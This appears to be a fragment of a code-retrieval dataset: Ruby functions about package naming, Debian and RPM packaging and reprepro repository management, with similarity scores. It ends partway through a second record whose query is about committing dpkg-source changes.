"def native_dependency_name(name, selected_platform = nil)\n if !selected_platform\n selected_platform = @packager.target_platform\n end\n\n # Identify this rock release and its ancestors\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, selected_platform.architecture)\n\n if name.is_a? String\n # Check for 'plain' name, the 'unprefixed' name and for the 'release' name\n if this_rock_release.ancestorContains(name) ||\n selected_platform.contains(name)\n # direct name match always is an os dependency\n # it can never be in a rock release\n return [name, true]\n end\n\n # try debian naming scheme for ruby\n if this_rock_release.ancestorContains(\"ruby-#{Deb.canonize(name)}\") ||\n selected_platform.contains(\"ruby-#{Deb.canonize(name)}\")\n return [\"ruby-#{Deb.canonize(name)}\", true]\n end\n\n # otherwise, ask for the ancestor that contains a rock ruby\n # package\n ancestor_release_name = this_rock_release.releasedInAncestor(\n @packager.debian_ruby_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release_name.empty?\n return [@packager.debian_ruby_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_ruby_name(name, true), false]\n else\n # ask for the ancestor that contains a rock ruby\n # package\n ancestor_release = this_rock_release.releasedInAncestor(\n @packager.debian_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release.empty?\n return [@packager.debian_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_name(name, true), false]\n end\n end",
"def package_name\n @version ? \"#{@name}-#{@version}\" : @name\n end",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def hadoop_package(name)\n return name unless hdp22?\n return name if node['platform_family'] == 'debian'\n fw = name.split('-').first\n pv = hdp_version.tr('.', '_').tr('-', '_')\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def fix_name(name)\n if name.start_with?(\"python\")\n # If the python package is called \"python-foo\" strip the \"python-\" part while\n # prepending the package name prefix.\n return [attributes[:python_package_name_prefix], name.gsub(/^python-/, \"\")].join(\"-\")\n else\n return [attributes[:python_package_name_prefix], name].join(\"-\")\n end\n end",
"def package_filename\n \"#{@package.name}_#{@package.version}_#{@package.architecture}.deb\"\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def hadoop_package(name)\n return name unless hdp22? || iop?\n return name if node['platform_family'] == 'debian'\n fw =\n if name == 'spark-core'\n name\n else\n name.split('-').first\n end\n pv =\n if hdp22?\n hdp_version.tr('.', '_').tr('-', '_')\n else\n node['hadoop']['distribution_version'].tr('.', '_')\n end\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def package_name(buildno=nil)\n if buildno\n buildno = Time.now.strftime(\"%H*60+%M\")\n versnum = \"#{version}.#{buildno}\"\n else\n versnum = version\n end\n\n if platform\n \"#{name}-#{versnum}-#{platform}\"\n else\n \"#{name}-#{versnum}\"\n end\n end",
"def package_name\n ver = if new_resource.version == 'latest'\n package_metadata[:version]\n else\n new_resource.version\n end\n \"Chef Development Kit v#{ver}\"\n end",
"def package_name\n if supports_ports?\n if makefile_variable_value(\"PKGNAME\", port_path) =~ /^(.+)-[^-]+$/\n $1\n else\n raise Chef::Exceptions::Package, \"Unexpected form for PKGNAME variable in #{port_path}/Makefile\"\n end\n else\n new_resource.package_name\n end\n end",
"def get_pkg_name(candidate_tag=nil, distro=nil)\n prod_name = self.task.prod\n\n # FIXME: stop that hardcoding... one day!\n pkg_name = self.name\n\n distro = self.task.distros[0] if distro.nil?\n\n is_scl_package = MeadSchedulerService.is_scl_package?(prod_name, self.name)\n # different naming convention for different products\n if prod_name == \"eap6\" && distro == 'el7' && is_scl_package\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n\n # Only enable scl thing for RHEL distros, aka when distro = el_\n elsif is_scl_package && distro.match(/^el/)\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n end\n pkg_name\n end",
"def package_name\n [self.config.organization, self.config.project_name].compact.collect(&:underscore).join('-')\n end",
"def safe_base_package_name\n if project.package_name =~ /\\A[a-z0-9\\.\\+\\-]+\\z/\n project.package_name.dup\n else\n converted = project.package_name.downcase.gsub(/[^a-z0-9\\.\\+\\-]+/, \"-\")\n\n log.warn(log_key) do\n \"The `name' component of IPS package names can only include \" \\\n \"lowercase alphabetical characters (a-z), numbers (0-9), dots (.), \" \\\n \"plus signs (+), and dashes (-). Converting `#{project.package_name}' to \" \\\n \"`#{converted}'.\"\n end\n converted\n end\n end",
"def package_name\n # TODO: verify renamed packages\n resource['title']\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil? then\n \"#{name}-#{version}\".untaint\n else\n \"#{name}-#{version}-#{platform}\".untaint\n end\n end",
"def vendored_package_name(package)\n\tFile.join($package_name, 'vendor/src', package)\nend",
"def original_name # :nodoc:\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{@name}-#{@version}\"\n else\n \"#{@name}-#{@version}-#{@original_platform}\"\n end\n end",
"def fmri_package_name\n version = project.build_version.split(/[^\\d]/)[0..2].join(\".\")\n platform = Ohai[\"platform_version\"]\n \"#{safe_base_package_name}@#{version},#{platform}-#{project.build_iteration}\"\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{name}-#{version}\".dup.tap(&Gem::UNTAINT)\n else\n \"#{name}-#{version}-#{platform}\".dup.tap(&Gem::UNTAINT)\n end\n end",
"def prefixed_label(package)\n label = ( package =~ /^#{$prefix}(.*)$/ ) && $1 || package\n label = '.' if label.empty?\n label\nend",
"def built_rpm_names(build)\n build.\n # Just names from the rpms without nvr info\n brew_rpms.map(&:name_nonvr).\n # Remove any duplicates\n uniq.\n # Filter out any debuginfo names\n reject{ |name| name =~ /debuginfo/ }.\n # Remove prefixes if there are any for this product. (Mainly for SCL, see Bug 1003719)\n map { |name| BrewRpmNamePrefix.strip_using_list_of_prefixes(@errata.product.brew_rpm_name_prefixes, name) }\n end",
"def set_dpkg_package_name(name)\n dpkg_package.name name\n dpkg_package.package_name name\n end",
"def package_name\n raise NotImplementedError\n end",
"def filtered_dependencies(pkginfo, with_rock_release_prefix = true)\n target_platform = @packager.target_platform\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, target_platform.architecture)\n\n deps_rock_pkginfos = pkginfo.dependencies[:rock_pkginfo].dup\n deps_osdeps_packages = pkginfo.dependencies[:osdeps].dup\n non_native_dependencies = pkginfo.dependencies[:nonnative].dup\n\n if target_platform.distribution_release_name\n # CASTXML vs. GCCXML in typelib\n if pkginfo.name =~ /typelib$/\n # add/remove the optional dependencies on the\n # rock-package depending on the target platform\n # there are typelib versions with and without the\n # optional depends. we know which platform requires\n # a particular dependency.\n deps_rock_pkginfos.delete_if do |pkginfo|\n pkginfo.name == \"castxml\" || pkginfo.name == \"gccxml\"\n end\n\n if target_platform.contains(\"castxml\")\n deps_osdeps_packages.push(\"castxml\")\n elsif target_platform.contains(\"gccxml\")\n #todo: these need to checked on the other platforms\n deps_osdeps_packages.push(\"gccxml\")\n else\n raise ArgumentError, \"TargetPlatform: #{target_platform} does neither support castxml nor gccml - cannot build typelib\"\n end\n end\n\n # Filter out optional packages, e.g. llvm and clang for all platforms where not explicitly available\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_optional.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n result = target_platform.contains(name)\n end\n end\n result\n end\n\n # Filter out excluded packages, e.g. libqwt5-qt4-dev\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_excluded.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n Packager.info \"#{pkginfo.name} excluding osdeps #{pkg_name} as dependency\"\n result = false\n end\n end\n result\n end\n\n # Filter ruby versions out -- we assume chroot has installed all\n # ruby versions\n #\n # This is a workaround, since the information about required packages\n # comes from the build server platform and might not correspond\n # with the target platform\n #\n # Right approach: bootstrap within chroot and generate source packages\n # in the chroot\n #deps_osdeps_packages = deps[:osdeps].select do |name|\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n name !~ /^ruby[0-9][0-9.]*/\n end\n\n # Prefer package of the OS for gems if they are available there\n #deps_nonnative_packages = deps[:nonnative].map do |name, version|\n non_native_dependencies = non_native_dependencies.map do |name, version|\n dep_name,is_osdep = native_dependency_name(name)\n # if with_rock_release_prefix is given all packages 'have to be'\n # os dependencies, otherwise it triggers further resolution of nonnative packages\n # which cannot exist (in resolve_all)\n if is_osdep || with_rock_release_prefix\n deps_osdeps_packages << dep_name\n nil\n else\n name\n end\n end.compact\n end\n\n deps_rock_packages = deps_rock_pkginfos.map do |pkginfo|\n debian_name = @packager.debian_name(pkginfo, with_rock_release_prefix)\n this_rock_release.packageReleaseName(debian_name)\n end.sort\n\n Packager.info \"'#{pkginfo.name}' with (available) rock package dependencies: '#{deps_rock_packages}'\"\n Packager.info \"'#{pkginfo.name}' with (available) osdeps dependencies: '#{deps_osdeps_packages}'\"\n\n # Return rock packages, osdeps and non native deps (here gems)\n {:rock => 
deps_rock_packages, :osdeps => deps_osdeps_packages, :nonnative => non_native_dependencies }\n end",
"def package_name\n raise Puppet::Error, 'luet requires packages have a category set' unless @resource[:category]\n\n \"#{@resource[:category]}/#{@resource[:name]}\"\n end",
"def full_name\n \"#{@package}.#{parameterized_name}\"\n end",
"def default_container_name\n full_release_name.gsub('_', '-')\n end",
"def apt_packages\n PRE_INSTALLED_OS_PACKAGES[@app.release].join(\" #{NL_TAB}\")\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def StripReleaseNo(pkg_name)\n build_no_pos = Builtins.findlastof(pkg_name, \"-\") # find trailing build no.\n\n if build_no_pos != nil && Ops.greater_than(build_no_pos, 0)\n # cut off trailing build no.\n pkg_name = Builtins.substring(pkg_name, 0, build_no_pos)\n end\n\n pkg_name\n end",
"def reprepro_has_package?(debian_pkg_name, release_name, codename, arch)\n @reprepro_lock.lock\n\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n cmd = \"#{reprepro_bin} -A #{arch} -T deb -V -b #{reprepro_dir} list #{codename} #{debian_pkg_name}\"\n package_info = `#{cmd}`\n if !package_info.empty?\n Packager.info \"Reprepro: #{debian_pkg_name} available for #{codename} #{arch}\"\n return true\n else\n Packager.info \"Reprepro: #{debian_pkg_name} not available for #{codename} #{arch}\"\n return false\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def version_file_from( name )\n\t\treturn name.\n\t\t\tsplit( /-/ ).\n\t\t\treject {|word| PACKAGE_IGNORE_WORDS.include?(word) }.\n\t\t\tjoin( '/' )\n\tend",
"def pkg_binary; \"pacaur\" end",
"def key\n \"gem-package-#{name}\"\n end",
"def dcv_package\n \"nice-dcv-#{node['cluster']['dcv']['version']}-#{node['cluster']['base_os']}-#{dcv_url_arch}\"\nend",
"def package_name(val = NULL_ARG)\n @package_name = val unless val.equal?(NULL_ARG)\n @package_name.nil? ? @name : @package_name\n end",
"def package_from_name\n case name.downcase\n when 'splunk' then package :splunk\n when 'universal_forwarder' then package :universal_forwarder\n else raise 'Package must be specified (:splunk or :universal_forwarder)'\n end\n end",
"def package_name(val = NULL)\n if null?(val)\n @package_name || name\n else\n @package_name = val\n end\n end",
"def build_product(name, final_package_prefix=nil)\n dc_name = name.downcase # Ex: 'server', 'devkit', 'moxi'\n\n act_name = dc_name\n act_name = 'membase' if dc_name == 'server'\n\n package_prefix = get_package_prefix(dc_name)\n\n case os_short()\n when 'win'\n fix_ism(\"is_#{dc_name}/#{dc_name}.ism\")\n fix_script(\"is_#{dc_name}/Script Files/Setup.Rul\", dc_name)\n sh \"\\\"#{INSTALL_SHIELD}\\\" -p is_#{dc_name}/#{dc_name}.ism\"\n package_prefix = final_package_prefix if final_package_prefix\n FileUtils.cp(Dir.glob(\"./is_#{dc_name}/PROJECT*/**/setup.exe\")[0],\n \"./is_#{dc_name}/#{package_prefix}_setup.exe\")\n else\n # For other generic unix-y platforms, do a tar'ing.\n # Here, we depend on a previous build_product_mm() step to\n # have filled the out directory with the right files.\n out_dir = get_tmp(\"#{package_prefix}\", false)\n\n if latest_only()\n suffix = 'latest'\n else\n suffix = product_version()\n end\n\n if \"#{dc_name}\" != \"devkit\"\n if is_rhel?\n # PRODUCT_VERSION looks like 0.0.0-0-g12344321-linux.i686\n # Let's put the git id as the release\n #\n familiarize = \"./RedHat/familiarize_#{act_name}.sh RedHat\" +\n \" #{File.dirname(out_dir)}/#{File.basename(out_dir)} #{PRODUCT_VERSION_PREFIX} 1\"\n hard_sh(familiarize)\n elsif is_ubuntu?\n # PRODUCT_VERSION looks like 0.0.0-0-g12344321-linux.i686\n # Let's put the git id as the release\n #\n make_bin_dist = \"./Ubuntu/make_bin_dist_#{act_name}.sh Ubuntu\" +\n \" #{File.dirname(out_dir)}/#{File.basename(out_dir)} #{PRODUCT_VERSION_PREFIX} 1\"\n hard_sh(make_bin_dist)\n end\n end\n\n if os_short() == 'sunos'\n tar = \"gtar\"\n else\n tar = \"#{bin('tar')}\"\n end\n\n print \"File.dirname(out_dir): #{File.dirname(out_dir)}\\n\"\n\n package = \"#{package_prefix}_#{suffix}.tar.gz\"\n cmd = \"#{tar} --directory #{File.dirname(out_dir)}\" +\n \" -czf #{package}\" +\n \" #{File.basename(out_dir)}\"\n hard_sh(cmd)\n\n if \"#{dc_name}\" != \"devkit\"\n if is_rhel?\n package = \"./#{package_prefix}_#{arch}_#{PRODUCT_GIT_DESCRIBE}.rpm\"\n cmd = \"rm -f #{package_prefix}_#{arch}_*.rpm\"\n hard_sh(cmd)\n\n cmd = \"cp #{package_prefix}_#{suffix}.tar.gz\" +\n \" ~/rpmbuild/SOURCES/#{package_prefix}_#{PRODUCT_VERSION_PREFIX}.tar.gz\"\n hard_sh(cmd)\n cmd = \"rpmbuild -bb RedHat/#{package_prefix}.spec.#{PRODUCT_VERSION_PREFIX}\"\n hard_sh(cmd)\n cmd = \"rm RedHat/#{package_prefix}.spec.#{PRODUCT_VERSION_PREFIX}\"\n hard_sh(cmd)\n\n cmd = \"mv ~/rpmbuild/RPMS/*/#{package_prefix}-#{PRODUCT_VERSION_PREFIX}-1.*.rpm #{package}\"\n hard_sh(cmd)\n elsif is_ubuntu?\n package = \"./#{package_prefix}_#{arch}_#{PRODUCT_GIT_DESCRIBE}.deb\"\n cmd = \"rm -f #{package_prefix}_#{arch}_*.deb\"\n hard_sh(cmd)\n\n cmd = \"mv ./Ubuntu/deb-dev/#{package_prefix}_*.deb #{package}\"\n hard_sh(cmd)\n end\n end\n\n if package\n if final_package_prefix\n package_prev = package\n package = final_package_prefix + '_' + package.split('_')[1..-1].join('_')\n cmd = \"mv #{package_prev} #{package}\"\n hard_sh(cmd)\n end\n\n hard_sh(\"md5sum #{package} > #{package}.md5\")\n end\n end\nend",
"def default_dev_package\n # Check for an override.\n return dev_package_overrides[package_name] if dev_package_overrides.include?(package_name)\n suffix = node.value_for_platform_family(debian: '-dev', rhel: '-devel', fedora: '-devel')\n # Platforms like Arch and Gentoo don't need this anyway. I've got no\n # clue how Amazon Linux does this.\n if suffix\n package_name + suffix\n else\n nil\n end\n end",
"def debian_version\n super ||\n ( version_gte?( ubuntu_version, [18,4] ) && '10' ) ||\n ( version_gte?( ubuntu_version, [15,4] ) && '8' ) ||\n ( version_gte?( ubuntu_version, [14,4] ) && '7' ) ||\n ( version_gte?( ubuntu_version, [12,4] ) && '6' )\n end",
"def release_name\n return nil unless @data['name'] && @data['version']\n [ dashed_name, @data['version'] ].join('-')\n end",
"def server_pkg_name\n platform_family?('debian') ? \"postgresql-#{new_resource.version}\" : \"postgresql#{new_resource.version.delete('.')}-server\"\n end",
"def is_deb?\n return !!@name.match(/^(debian|ubuntu|cumulus|huaweios)-.*$/)\n end",
"def rpm_no_arch\n @rpm_no_arch\n end",
"def release_manifest_name\n \"#{name}-release-manifest\"\n end",
"def drop_prefix(repo)\n repo.split('-')[1].to_s.capitalize\nend",
"def package_basename(extension='.gem')\n [ package_name, version ].join('-') + extension\n end",
"def installer_filename\n if PRE_RELEASE\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar\"\n else\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar.gz\"\n end\nend",
"def full_name\n \"#{@name}-#{@version}\"\n end",
"def pkg_cmd; \"#{pkg_binary}\" end",
"def native_pkg_to_install_string(pkg)\n name = pkg[:metadata][:name]\n version = pkg[:metadata][:version]\n package_version = pkg[:metadata][:package_version]\n pkgname = \"#{name}-#{version}\"\n if package_version\n pkgname << \"-#{package_version}\"\n end\n pkgname\n end",
"def package_repository(package_name, desired_version, arch = nil)\n package(package_name, arch, true, false) do |pkg|\n return pkg.repoid if desired_version == pkg.version.to_s\n end\n\n nil\n end",
"def repository_name\n @repository_name ||= \"#{project_name}-boshrelease\"\n end",
"def directory_name\n \n directory_name = ''\n if self.pcb_revision != ''\n directory_name = 'pcb' \n directory_name += self.pcb_prefix + '_' \n directory_name += self.pcb_number + '_'\n directory_name += self.pcb_dash_number + '_'\n directory_name += self.pcb_revision\n end\n \n return directory_name\n \n end",
"def get_linux_distro_version_codename\n version_codename_regex = /^VERSION_CODENAME=\\W*(\\w+)\\W*/\n File.open('/etc/os-release') do |release_file|\n release_file.each do |line|\n return line.match(version_codename_regex)[1].downcase if line =~ version_codename_regex\n end\n end\n ''\n end",
"def file_name\n \"#{full_name}.gem\"\n end",
"def default_platform_service_name(version: installed_postgresql_major_version, source: installed_postgresql_package_source)\n if platform_family?('rhel', 'fedora', 'amazon') && source.eql?(:repo)\n \"postgresql-#{version}\"\n else\n 'postgresql'\n end\n end",
"def deregister_debian_package(pkg_name_expression, release_name, codename, exactmatch = false)\n @reprepro_lock.lock\n\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n logfile = File.join(log_dir,\"deregistration-reprepro-#{release_name}-#{codename}.log\")\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir\n\n if exactmatch\n cmd << \"remove\" << codename << pkg_name_expression\n else\n cmd << \"removematched\" << codename << pkg_name_expression\n end\n IO::write(logfile, \"#{cmd}\\n\", :mode => \"a\")\n Packager.info \"Remove existing package matching '#{pkg_name_expression}': #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n Packager.info \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n else\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir\n cmd << \"deleteunreferenced\"\n IO::write(logfile, \"#{cmd}\\n\", :mode => \"a\")\n system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def supported_pkgs\n {\"rpm\"=>1, \"deb\"=>1}\nend",
"def rings_project_name\n \"#{root_project_name}#{RINGS_PREFIX}\"\n end",
"def get_saltstack_package_full_name(package)\n # pillar = YAML.safe_load(File.read('test/salt/pillar/windows.sls'))\n url = 'https://raw.githubusercontent.com/saltstack/salt-winrepo-ng/master/'\n files = [package + '.sls', package + '/init.sls']\n # example: package = \"7zip\"=>{\"version\"=>\"18.06.00.0\", \"refresh_minion_env_path\"=>false}\n saltstack_package_full_name = files.find do |checkme|\n ps = \"$f = (((Get-ChildItem -Path $env:LOCALAPPDATA -Filter 'salt-winrepo-ng' -Recurse -Directory).Fullname[0]) + '\\\\#{checkme.sub('/', '\\\\')}'); if (Test-Path $f -PathType Leaf) {Get-Content -Path $f}\"\n begin\n file = (open(url + checkme) & :read)\n rescue\n begin\n file = (powershell(ps).stdout)\n rescue\n next\n end\n end\n unless file.nil? || file.empty?\n candidate = file.match(/full_name: '([\\S]+).*'/).captures[0]\n end\n break candidate unless candidate.nil?\n end\n Inspec::Log.debug('[get_saltstack_package_full_name] found candidate: ' + saltstack_package_full_name)\n saltstack_package_full_name\nend",
"def platform_shortname\n if rhel?\n if \"rocky\" == Ohai[\"platform\"]\n \"rocky\"\n else\n \"el\"\n end\n elsif suse?\n \"sles\"\n else\n Ohai[\"platform\"]\n end\n end",
"def reprepro_has_dsc?(debian_pkg_name, release_name, codename, reuseLock = false)\n @reprepro_lock.lock unless reuseLock\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n cmd = \"#{reprepro_bin} -T dsc -V -b #{reprepro_dir} list #{codename} #{debian_pkg_name}\"\n package_info = `#{cmd}`\n if !package_info.empty?\n Packager.info \"Reprepro: dsc file for #{debian_pkg_name} available for #{codename}\"\n return true\n else\n Packager.info \"Reprepro: dsc file for #{debian_pkg_name} not available for #{codename}\"\n return false\n end\n ensure\n @reprepro_lock.unlock unless reuseLock\n end\n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def get_pkg_extn\n node.java.version == '6' ? 'bin' : node[:java]['package']['extn']\n end",
"def available_version(package_name, arch = nil)\n version(package_name, arch, true, false)\n end",
"def gem_name\n \"#{@account}-#{@name}\"\n end",
"def to_s\n \"#{@distro.capitalize} #{@product.gsub(/_/, ' ').capitalize} #{@version}\"\n end",
"def name(_prefix = false)\n 'Puppet Functions'\n end",
"def spec_name\n \"#{full_name}.gemspec\"\n end",
"def kernel_release\n uname('-r')\n end",
"def native_release_packages\n @attributes[:native_release_packages]\n end",
"def package_file\n File.join('/tmp/fpm-recipes/duo-openvpn/pkg',\n case node['platform_family']\n when 'debian'\n \"duo-openvpn_#{version}-#{revision}_amd64.deb\"\n when 'rhel'\n \"duo-openvpn-#{version}-#{revision}.x86_64.rpm\"\n end)\n end",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def generateBuildNamePrefix_Debug()\n prefix = generateBuildNamePrefix\n return prefix + \"-debug\"\nend",
"def type_and_version\n self.name.gsub(\"#{Licensed::Sources.name}::\", \"\")\n .gsub(/([A-Z\\d]+)([A-Z][a-z])/, \"\\\\1_\\\\2\".freeze)\n .gsub(/([a-z\\d])([A-Z])/, \"\\\\1_\\\\2\".freeze)\n .downcase\n .split(\"::\")\n end",
"def bot_short_name_without_version(pr)\n bot_short_name(pr).sub(/_v\\d*$/, '_v')\n end",
"def fully_qualified_name\n return \".#{self.package}\"\n end",
"def rpm_package_information\n super\n end",
"def get_java_ospkg_name (platform, version, type)\n pfx = \"#{platform.downcase == 'rhel' ? \"java-1.#{version}.0-\" :''}\"\n case platform.downcase\n when 'rhel'\n sfx = (type.downcase == 'jre' ? '' :'-devel')\n else\n sfx = \"-#{version}-\".concat(type.downcase == 'jre' ? 'jre' :'jdk')\n end\n \"#{pfx}openjdk#{sfx}\"\n end",
"def getNameForPrecompiled\n sanitizeForPath(\"#{@Name}_#{@Version}_\" +\n (@BranchEpoch ? \"sv_#{@BranchEpoch}_\" : '') +\n \"opts_#{optionsHash}\")\n end",
"def project_name\n DeliveryGolang::Helpers.project_name(node)\n end",
"def dmg_package_app\n case new_resource.source\n when :direct\n ::File.basename(package_metadata[:url], '.dmg')\n else\n ::File.basename(new_resource.source.to_s, '.dmg')\n end\n end",
"def package_set_name(path, branch='master')\n file = dir_git(path,branch,/source\\.yml/)\n raw = raw_file_from_git(path,file[0])\n yaml = YAML.load(raw)\n yaml[\"name\"]\n end",
"def gem_name\n @gem_name ||= \"sprout-#{clean_name}-library\"\n end",
"def full_name\n \"#{spec.name}-#{spec.version}\"\n end",
"def manifest_name(name, pack_type)\n name.chomp(\".#{pack_type}\")\n end",
"def version_tag_prefix\n if root_path == repo.root_path\n 'v'\n else\n (repo_rel_path / 'v').to_s\n end\n end"
] | [
"0.8155794",
"0.7976292",
"0.78808445",
"0.7630828",
"0.7524989",
"0.7514469",
"0.6860359",
"0.68594384",
"0.6740509",
"0.671844",
"0.66456854",
"0.65610325",
"0.648769",
"0.6372021",
"0.63600284",
"0.6351584",
"0.63399094",
"0.6310774",
"0.63089454",
"0.6305904",
"0.629034",
"0.6286621",
"0.62648803",
"0.625493",
"0.61973244",
"0.6154207",
"0.61303467",
"0.6125259",
"0.6101456",
"0.606495",
"0.60479015",
"0.5967625",
"0.5959168",
"0.5957608",
"0.59039295",
"0.5894223",
"0.58698374",
"0.5852533",
"0.5847504",
"0.58281296",
"0.5823175",
"0.576218",
"0.57613564",
"0.5752895",
"0.5731973",
"0.57240903",
"0.571939",
"0.57131785",
"0.5700508",
"0.5698889",
"0.56937575",
"0.5675853",
"0.5666499",
"0.563792",
"0.5633305",
"0.56244594",
"0.56016505",
"0.55945796",
"0.5581084",
"0.5580865",
"0.55751324",
"0.5570325",
"0.554582",
"0.55409545",
"0.55221504",
"0.5518844",
"0.55115247",
"0.5511518",
"0.54758066",
"0.5471588",
"0.54478467",
"0.54451185",
"0.5420234",
"0.54189444",
"0.5407809",
"0.54018605",
"0.5394238",
"0.5393318",
"0.5386297",
"0.5384664",
"0.5383102",
"0.53810513",
"0.5373678",
"0.5373678",
"0.5373678",
"0.5373678",
"0.5367096",
"0.5367081",
"0.536166",
"0.5347765",
"0.5346637",
"0.53407705",
"0.5327955",
"0.532221",
"0.5318476",
"0.53171295",
"0.53070235",
"0.5304166",
"0.5303312",
"0.5300788"
] | 0.82506204 | 0 |
Commit changes of a Debian package using dpkg-source commit in a given directory (or the current one by default) | def dpkg_commit_changes(patch_name, directory = Dir.pwd,
prefix: "apaka-",
logfile: nil,
include_removal: false
)
Dir.chdir(directory) do
Packager.debug ("commit changes to debian pkg: #{patch_name}")
# Since dpkg-source will open an editor we have to
# take this approach to make it pass directly in an
# automated workflow
ENV['EDITOR'] = "/bin/true"
cmd = ["dpkg-source", "--commit"]
cmd << "--include-removal" if include_removal
cmd << "."
cmd << prefix + patch_name
if !system(*cmd,
[:out, :err] => redirection(logfile,"a"),
:close_others => true)
raise RuntimeError, "#{self.class}#{__method__}: failed to commit #{patch_name}"
end
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def dpkg_commit_changes(patch_name, directory = Dir.pwd)\n Dir.chdir(directory) do\n Packager.info (\"commit changes to debian pkg: #{patch_name}\")\n # Since dpkg-source will open an editor we have to\n # take this approach to make it pass directly in an\n # automated workflow\n ENV['EDITOR'] = \"/bin/true\"\n `dpkg-source --commit . #{patch_name}`\n end\n end",
